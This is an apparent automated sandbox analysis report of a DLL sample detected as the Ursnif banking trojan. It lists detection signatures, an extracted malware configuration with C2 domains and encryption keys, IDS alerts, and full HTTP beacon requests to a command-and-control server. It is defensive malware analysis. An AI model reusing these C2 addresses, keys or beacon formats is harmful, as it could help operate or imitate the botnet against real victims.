Windows Analysis Report 2u2mgtylJy.dll

Overview

General Information

Sample Name: 2u2mgtylJy.dll
Analysis ID: 498331
MD5: 503edcfec2262373e36deaa37f640332
SHA1: 37648e8ced69d8adc7be8bde5a61138cbb0f9e6a
SHA256: 3ef3beaa49e07f171927a772a417109df6f137c4fa321dbd17daaa7cb47392be
Tags: dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: Encoded IEX
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Suspicious powershell command line found
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Antivirus detection for URL or domain
Source: http://init.icecreambob.com/c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF Avira URL Cloud: Label: malware

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F33FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_00F33FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_032E3FAB

Compliance:

barindex
Uses 32bit PE files
Source: 2u2mgtylJy.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: 2u2mgtylJy.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.504539296.0000000004BC0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.540765718.00000000064E0000.00000004.00000001.sdmp
Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: 2u2mgtylJy.dll

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49759 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49759 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49760 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49762 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49763 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49763 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49764 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49764 -> 194.147.86.221:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49765 -> 194.147.86.221:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80 Jump to behavior
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NETRACK-ASRU NETRACK-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000010.00000003.470111978.00000225DF294000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, control.exe, 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: unknown DNS traffic detected: queries for: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /c0EOvrV0qc5VSAwBXBa8q/dPW7TTNz1rcIbr1g/OGkQFSQW_2Bb_2B/CxLaOk_2FnPEARFaVw/Csb60MwQA/8Ypl3_2BWvnuCQW7vD8i/qdzylpoZqovaHq0DLVW/usKTeoNgbrF2w_2BDuaJdC/AKwpjjkO35n80/YGAxFnFT/q0_2FYrqQ4gjnchYC1nCbyF/Hp5QomuD7V/q_2FNrEW28WwhW5J3/evh_2FuGxsfW/FTakqhOgg0C/5jOddm5Nv3UnAe/3xfYM3v5ExQ_2BFLHBcHx/XxFQgyV8rJEGI_2B/SbbjLh_2FBHqXrD/63xNgkJW9N_2F4ADkn/Y6hvY_2Bp/meMPSPNF59dChat/emng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /uIg4rVau7E/pTOdpcWCqXLyW2Bb5/JVlWWIBKAi_2/FojTkl9LBdj/5NQUgJKju0RtNO/tzDm4s507_2F4kRlBxNQt/CqxnS5LJs3_2FGkx/6ujxicMmApQgR_2/FMWid4EYZr5bz4ddPN/IQ9nZpFjW/G2s2Nwqd9U74yv0lJk1Z/vtVoAMsIMmzYYMF6sq8/woVgKPwWZHePIzS0ff2CWr/hCbiWIGzzlF_2/FmwQ3_2F/eBtb4969HyiFKQjm86_2Fle/DPRDUjXUk5/_2F4UeWwjjX_2FtrJ/9zRp4NGcvnKV/V15fgxhlV6E/wQC8oVitxi5FBk/gvAuYUOLQwJUKJ5EjKZtE/tSYoF HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /6ekkhXb3MtuoC3_2FyvMu7l/0daElC7mOy/R6ZAlklcJ6nCEa1JG/77QHYRlDFZhY/CKh_2FHTF7b/anY3A4myrq9HMr/O0ixl1A9Ab9AH_2B1NpLR/OZcyW0ela3aJDPib/aDAo_2FD0usl4GG/4oFEpWmdLkMOuuyhNo/mbHFma2ju/jhqMzX7tDC0zN5vsOrlK/LJLMnBely6_2FcvVC3_/2BGwUD6Z4I7FCi_2F4cLgE/uWy6vjfOkNRx2/Rg68drga/pJzjEQy6uB0KP1_2FePOOmA/O6h7H3iuIm/pcPhmiBWtj4KTiWxG/SDfQhFDr6R3L/tcUc0BMyzZU/A0ixqYVRKBrNc/C6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /mGUnO6XImcveA33xjh/RHKTTJs7w/ZXD5AGL8Z6b5Ydjn0EBf/EEGi_2B0P5BK3ftqfJ8/5Y3Dt3ILkK2tDhNHmvNVf_/2F6_2F9GG6nmd/AY3q5qlr/sduRVTyfg13io80O41ww0bD/nRvcHECqk0/hG_2B3Z8IlsbTadMs/jPEgqC11z_2F/jJ4I6p_2FzT/fAEznSbYmzFTCx/tlrGc2O52xjGLqfXmjqXa/6zgFstkYf810iRhc/DHMuTlvestji1tB/IFQcQqkY0w_2Fc2Xsv/6z833jFgl/JXYjGT9FPcN_2B_2FZhr/B_2FsGJxQAgoh7FOdw4/SNBrK HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /sv2O34qq/Kta1HvKsZ3tgM7tFYBomACu/mI6UagQ8wE/lYb6amh0XTBBLuSs2/uL4X3YpCek6i/1bj7_2BSpik/RZgu0vnHADL_2F/DGIXfo8xI_2Fn7H2kdqcK/qXQVYi0KeQpUICab/7iJEzXcfcMykGMx/EJryNKNs8qa83X8s7Y/7tfLoTfti/U8NCgomMwZYVXU814zuK/PzGEHqwSUIE_2B6HbQA/nZ16OvnVY6z_2B_2BbpXoo/EiIV_2FcZQIU_/2B_2FmU5/qne1F46TC0T7BPdNnwGtiCp/b9fo2Sp7mS/YC35VhxW_2F7DBQpp/ArbAVDFUHmnE/HIkiAjFrV16/J_2FNADvxnl/nN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com
Source: global traffic HTTP traffic detected: GET /kk7MynOrZ2/z5Qh_2BFEZjQ9BqRe/l_2Bgh6swCWQ/Zdtmhdulegn/LFRgPgQWX6bTGy/Yy1zwx8XOzt5N3jy5Pcmz/ts9skZhrek9mZcWd/xn8wNPnE877ouqT/kBRevLD80b3Nerfvje/33yHfRtoq/EihB_2BQDiRYgQil4p84/D0DabPhF3qer2j9EJKn/WvoAJfNTpYAIRvXDTaZZDH/fUk_2BZih9cWP/r9VQkrFe/xqlWhFz_2BH7D5UWSdx5_2F/aZRLZpngni/St06qc8pfSPa4Smvv/1_2F3_2B3r2l/ptas5GP7wAZ/bcuDVyi8nVrKje/tpxJ_2BEDA1LSa1gW0Wq6/omxVT HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: init.icecreambob.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
